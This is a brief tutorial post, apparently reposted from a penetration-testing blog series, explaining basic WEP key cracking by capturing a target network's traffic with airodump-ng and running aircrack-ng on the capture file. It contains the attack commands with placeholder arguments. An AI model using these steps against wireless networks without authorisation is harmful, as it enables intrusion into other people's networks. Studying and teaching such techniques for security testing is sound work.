码迷,mamicode.com
首页 > Web开发 > 详细

Ethical Hacking - NETWORK PENETRATION TESTING(8)

时间:2019-11-12 01:18:40      阅读:99      评论:0      收藏:0      [点我收藏+]

标签:and   cap   bss   from   testing   creat   ram   try   when   

WEP Cracking Basic case

Run airdump-ng to log all traffic from the target network.

airodump-ng --channel [channel] --bssid [bssid] --write [file-name][interface]

At the same time, we shall use aircrack-ng to try and crack the key using the capture file created by the above command.

aircrack-ng [file-name]

Keep both programs running at the same time and aircrack-ng will be able to determine the key when the number of IV‘s in the cap file is enough.

 

Ethical Hacking - NETWORK PENETRATION TESTING(8)

标签:and   cap   bss   from   testing   creat   ram   try   when   

原文地址:https://www.cnblogs.com/keepmoving1113/p/11839087.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!